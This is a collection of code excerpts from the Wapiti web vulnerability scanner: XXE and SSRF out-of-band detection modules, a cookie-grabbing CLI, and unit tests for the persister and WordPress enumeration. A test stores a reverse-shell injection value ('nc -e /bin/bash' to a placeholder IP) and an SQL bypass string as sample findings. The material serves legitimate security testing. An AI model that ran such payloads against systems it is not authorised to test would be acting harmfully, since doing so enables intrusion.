    await sleep(2)
    # Once the attacks are done, query the endpoint to know whether it was contacted
    endpoint_request = Request(endpoint_url)
    try:
        response = await self.crawler.async_send(endpoint_request)
    except RequestError:
        self.network_errors += 1
        print(_("[!] Unable to request endpoint URL '{}'").format(self.internal_endpoint))
        return

    data = response.json
    if not isinstance(data, dict):
        return

    for request_id in data:
        original_request = self.persister.get_path_by_id(request_id)
        if original_request is None:
            continue
            # raise ValueError("Could not find the original request with ID {}".format(request_id))

        page = original_request.path
        for hex_param in data[request_id]:
            parameter = unhexlify(hex_param).decode("utf-8")

            for infos in data[request_id][hex_param]:
                request_url = infos["url"]
                # Date in ISO format
                request_date = infos["date"]
                request_ip = infos["ip"]
                request_size = infos["size"]
                payload_name = infos["payload"]

                if parameter == "QUERY_STRING":
                    vuln_message = Messages.MSG_QS_INJECT.format(self.MSG_VULN, page)
                elif parameter == "raw body":
                    vuln_message = _(
                        "Out-Of-Band {0} by sending raw XML in request body"
                    ).format(self.MSG_VULN)
                else:
                    vuln_message = _(
                        "Out-Of-Band {0} via injection in the parameter {1}"
                    ).format(self.MSG_VULN, parameter)

                more_infos = _(
                    "The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
                    "Received data can be seen at {3}."
                ).format(request_size, request_date, request_ip, request_url)

                vuln_message += "\n" + more_infos

                # Fallback payload in case we cannot find the one that was really used
                payload = (
                    "<xml>"
                    "See https://phonexicum.github.io/infosec/xxe.html#attack-vectors"
                    "</xml>"
                )

                for payload, _flags in self.payloads:
                    if "{}.dtd".format(payload_name) in payload:
                        payload = payload.replace("[PATH_ID]", str(original_request.path_id))
                        payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479")
                        break

                if parameter == "raw body":
                    mutated_request = Request(
                        original_request.path,
                        method="POST",
                        enctype="text/xml",
                        post_params=payload
                    )
                elif parameter == "QUERY_STRING":
                    mutated_request = Request(
                        "{}?{}".format(original_request.path, quote(payload)),
                        method="GET"
                    )
                elif parameter in original_request.get_keys or parameter in original_request.post_keys:
                    mutator = Mutator(
                        methods="G" if original_request.method == "GET" else "P",
                        payloads=[(payload, Flags())],
                        qs_inject=self.must_attack_query_string,
                        parameters=[parameter],
                        skip=self.options.get("skipped_parameters")
                    )
                    mutated_request, __, __, __ = next(mutator.mutate(original_request))
                else:
                    mutator = FileMutator(
                        payloads=[(payload, Flags())],
                        parameters=[parameter],
                        skip=self.options.get("skipped_parameters")
                    )
                    mutated_request, __, __, __ = next(mutator.mutate(original_request))

                self.add_vuln(
                    request_id=original_request.path_id,
                    category=NAME,
                    level=HIGH_LEVEL,
                    request=mutated_request,
                    info=vuln_message,
                    parameter=parameter
                )

                self.log_red("---")
                self.log_red(vuln_message)
                self.log_red(Messages.MSG_EVIL_REQUEST)
                self.log_red(mutated_request.http_repr())
                self.log_red("---")
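As a sanity check on the hard-coded hex string above, and to make the parsing loop easier to follow, here is an illustrative answer from the endpoint. Every value is invented; only the nesting (request ID, then hex-encoded parameter name, then a list of hit records with url, date, ip, size and payload fields) comes from the code.

from binascii import hexlify

# "72617720626f6479" used in finish() is simply "raw body" hex-encoded
assert hexlify(b"raw body").decode() == "72617720626f6479"

# Invented example of the JSON structure finish() walks through
data = {
    "3": {                                 # request path_id
        "72617720626f6479": [              # hex-encoded parameter name
            {
                "url": "https://wapiti3.ovh/xxe_data/yolo/3/72617720626f6479/1.txt",
                "date": "2019-08-17T16:52:41+00:00",
                "ip": "192.168.2.1",
                "size": 1024,
                "payload": "linux2",       # made-up payload name
            }
        ]
    }
}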
async def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!"))

    crawler = AsyncCrawler("http://httpbin.org/")
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")
    simple_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", "d"]]
    )
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If some requests are stored, it means the scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            await crawler.async_send(req)
            # Add the sent request
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links())) == 1
    # We still have two entries in paths though, as the resource just got updated
    assert persister.count_paths() == 2

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass")
    assert next(persister.get_payloads())

    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))

    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    persister.close()
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"
    await crawler.close()
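A quick stdlib check of the query string given to naughty_get above: %20 decodes to a space, so the stored value is the classic boolean expression "1 OR 0" (a bare %OR would not be a valid percent-encoded sequence):

from urllib.parse import unquote

assert unquote("1%20OR%200") == "1 OR 0"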
if "[TIMEOUT]" in clean_line: flag_type = PayloadType.time clean_line = clean_line.replace("[TIMEOUT]", "") clean_line = clean_line.replace("\\0", "\0") return clean_line, Flags(type=flag_type) if __name__ == "__main__": mutator = Mutator(payloads=[("INJECT", Flags()), ("ATTACK", Flags())], qs_inject=True, max_queries_per_pattern=16) res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = Request("http://httpbin.org/get?login=admin&password=letmein", ) assert res1.hash_params == res2.hash_params for evil_request, param_name, payload, flags in mutator.mutate(res1): print(evil_request) print(flags) print('') print("#" * 50) print('')
def attack(self):
    methods = ""
    if self.do_get:
        methods += "G"
    if self.do_post:
        methods += "PF"

    mutator = SsrfMutator(
        session_id=self._session_id,
        methods=methods,
        payloads=self.payloads,
        qs_inject=self.must_attack_query_string,
        skip=self.options.get("skipped_parameters")
    )

    http_resources = self.persister.get_links(attack_module=self.name) if self.do_get else []
    forms = self.persister.get_forms(attack_module=self.name) if self.do_post else []

    for original_request in chain(http_resources, forms):
        if self.verbose >= 1:
            print("[+] {}".format(original_request))

        # Let's just send the payloads: we don't care about the response itself,
        # what we want to know is whether the target contacted the endpoint.
        for mutated_request, parameter, payload, flags in mutator.mutate(original_request):
            try:
                if self.verbose == 2:
                    print("[¨] {0}".format(mutated_request))

                try:
                    self.crawler.send(mutated_request)
                except ReadTimeout:
                    continue
            except (KeyboardInterrupt, RequestException) as exception:
                yield exception

        yield original_request

    # Once the attacks are done, query the endpoint to know whether it was contacted
    endpoint_request = Request("https://wapiti3.ovh/get_ssrf.php?id={}".format(self._session_id))
    try:
        response = self.crawler.send(endpoint_request)
    except ReadTimeout:
        pass
    else:
        data = response.json
        if isinstance(data, dict):
            for request_id in data:
                original_request = self.persister.get_path_by_id(request_id)
                if not original_request:
                    raise ValueError("Could not find the original request with that ID")

                page = original_request.path
                for hex_param in data[request_id]:
                    parameter = unhexlify(hex_param).decode("utf-8")

                    for infos in data[request_id][hex_param]:
                        request_url = infos["url"]
                        # Date in ISO format
                        request_date = infos["date"]
                        request_ip = infos["ip"]
                        request_method = infos["method"]
                        # request_size = infos["size"]

                        if parameter == "QUERY_STRING":
                            vuln_message = Vulnerability.MSG_QS_INJECT.format(self.MSG_VULN, page)
                        else:
                            vuln_message = _(
                                "{0} via injection in the parameter {1}.\n"
                                "The target performed an outgoing HTTP {2} request at {3} with IP {4}.\n"
                                "Full request can be seen at {5}"
                            ).format(
                                self.MSG_VULN,
                                parameter,
                                request_method,
                                request_date,
                                request_ip,
                                request_url
                            )

                        mutator = Mutator(
                            methods="G" if original_request.method == "GET" else "P",
                            payloads=[("http://external.url/page", set())],
                            qs_inject=self.must_attack_query_string,
                            skip=self.options.get("skipped_parameters")
                        )

                        mutated_request, parameter, taint, flags = next(mutator.mutate(original_request))

                        self.add_vuln(
                            request_id=original_request.path_id,
                            category=Vulnerability.SSRF,
                            level=Vulnerability.HIGH_LEVEL,
                            request=mutated_request,
                            info=vuln_message,
                            parameter=parameter
                        )

                        self.log_red("---")
                        self.log_red(
                            Vulnerability.MSG_QS_INJECT if parameter == "QUERY_STRING"
                            else Vulnerability.MSG_PARAM_INJECT,
                            self.MSG_VULN,
                            page,
                            parameter
                        )
                        self.log_red(Vulnerability.MSG_EVIL_REQUEST)
                        self.log_red(mutated_request.http_repr())
                        self.log_red("---")
def getcookie_main():
    parser = argparse.ArgumentParser(description="Wapiti-getcookie: A utility to grab cookies from a webpage")

    parser.add_argument(
        '-u', '--url',
        help='First page to fetch for cookies',
        required=True
    )

    parser.add_argument(
        '-c', '--cookie',
        help='Cookie file in Wapiti JSON format where cookies will be stored',
        required=True
    )

    parser.add_argument(
        '-p', '--proxy',
        help='Address of the proxy server to use'
    )

    parser.add_argument(
        '-d', '--data',
        help='Data to send to the form with POST'
    )

    args = parser.parse_args()

    parts = urlparse(args.url)
    if not parts.scheme or not parts.netloc or not parts.path:
        print(_("Invalid base URL was specified, please give a complete URL with protocol scheme"
                " and slash after the domain name."))
        exit()

    server = parts.netloc
    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))

    crawler = Crawler(base)

    if args.proxy:
        proxy_parts = urlparse(args.proxy)
        if proxy_parts.scheme and proxy_parts.netloc:
            if proxy_parts.scheme.lower() in ("http", "https", "socks"):
                crawler.set_proxy(args.proxy)

    # Open or create the cookie file and delete previous cookies from this server
    jc = jsoncookie.JsonCookie()
    jc.open(args.cookie)
    jc.delete(server)

    # A first crawl is sometimes necessary, so let's fetch the webpage
    page = crawler.get(Request(args.url), follow_redirects=True)
    jc.addcookies(crawler.session_cookies)

    if not args.data:
        # No data specified, try interactive mode by fetching forms
        forms = []
        for i, form in enumerate(page.iter_forms(autofill=False)):
            if i == 0:
                print('')
                print(_("Choose the form you want to use or enter 'q' to leave:"))
            print("{0}) {1}".format(i, form))
            forms.append(form)

        ok = False
        if forms:
            nchoice = -1
            print('')
            while not ok:
                choice = input(_("Enter a number: "))
                if choice.isdigit():
                    nchoice = int(choice)
                    if len(forms) > nchoice >= 0:
                        ok = True
                elif choice == 'q':
                    break

            if ok:
                form = forms[nchoice]
                print('')
                print(_("Please enter values for the following form:"))
                print(_("url = {0}").format(form.url))

                post_params = form.post_params
                for i, kv in enumerate(post_params):
                    field, value = kv
                    if value:
                        new_value = input(field + " (" + value + "): ")
                    else:
                        new_value = input("{}: ".format(field))
                    post_params[i] = [field, new_value]

                request = Request(form.url, post_params=post_params)
                crawler.send(request, follow_redirects=True)
                jc.addcookies(crawler.session_cookies)
    else:
        request = Request(args.url, post_params=args.data)
        crawler.send(request, follow_redirects=True)
        jc.addcookies(crawler.session_cookies)

    jc.dump()
    jc.close()
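Since getcookie_main() takes its options from the command line, one way to drive it from another script is to set sys.argv before calling it; the URL and output path below are illustrative.

import sys

# Illustrative invocation: grab cookies from perdu.com into /tmp/cookies.json
sys.argv = [
    "wapiti-getcookie",
    "--url", "http://perdu.com/",
    "--cookie", "/tmp/cookies.json",
]
getcookie_main()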
async def test_plugin():
    # Response telling that WordPress is used
    respx.get("http://perdu.com/").mock(
        return_value=httpx.Response(
            200,
            text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
            <h2>Pas de panique, on va wordpress vous aider</h2> \
            Wordpress wordpress WordPress\
            <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
        )
    )

    # Response for a versioned plugin
    respx.get("http://perdu.com/wp-content/plugins/bbpress/readme.txt").mock(
        return_value=httpx.Response(
            200,
            text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
            <h2>Pas de panique, on va wordpress vous aider</h2> \
            Wordpress wordpress WordPress\
            Stable tag: 2.6.6 \
            <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
        )
    )

    # Response for a plugin detected without version (403 forbidden response)
    respx.get("http://perdu.com/wp-content/plugins/wp-reset/readme.txt").mock(
        return_value=httpx.Response(
            403,
            text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
            <h2>Pas de panique, on va wordpress vous aider</h2> \
            Wordpress wordpress WordPress\
            Stable tag: 9.5.1 \
            <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
        )
    )

    # Response for a badly formatted readme.txt of a plugin
    respx.get("http://perdu.com/wp-content/plugins/unyson/readme.txt").mock(
        return_value=httpx.Response(
            200,
            text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
            <h2>Pas de panique, on va wordpress vous aider</h2> \
            Wordpress wordpress WordPress\
            Version Tested : 4.5 \
            <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
        )
    )

    # Any other plugin or theme readme.txt answers with a 404
    respx.get(url__regex=r"http://perdu.com/wp-content/plugins/.*?/readme.txt").mock(return_value=httpx.Response(404))
    respx.get(url__regex=r"http://perdu.com/wp-content/themes/.*?/readme.txt").mock(return_value=httpx.Response(404))
    respx.get(url__regex=r"http://perdu.com/.*?").mock(return_value=httpx.Response(404))

    persister = AsyncMock()

    request = Request("http://perdu.com")
    request.path_id = 1

    crawler = AsyncCrawler("http://perdu.com")
    options = {"timeout": 10, "level": 2}

    module = ModuleWpEnum(crawler, persister, options, Event())

    await module.attack(request)

    assert persister.add_payload.call_count
    assert persister.add_payload.call_args_list[0][1]["module"] == "wp_enum"
    assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology")
    assert persister.add_payload.call_args_list[0][1]["info"] == (
        '{"name": "bbpress", "versions": ["2.6.6"], "categories": ["WordPress plugins"]}'
    )
    assert persister.add_payload.call_args_list[1][1]["info"] == (
        '{"name": "wp-reset", "versions": [""], "categories": ["WordPress plugins"]}'
    )
    assert persister.add_payload.call_args_list[2][1]["info"] == (
        '{"name": "unyson", "versions": [""], "categories": ["WordPress plugins"]}'
    )
    await crawler.close()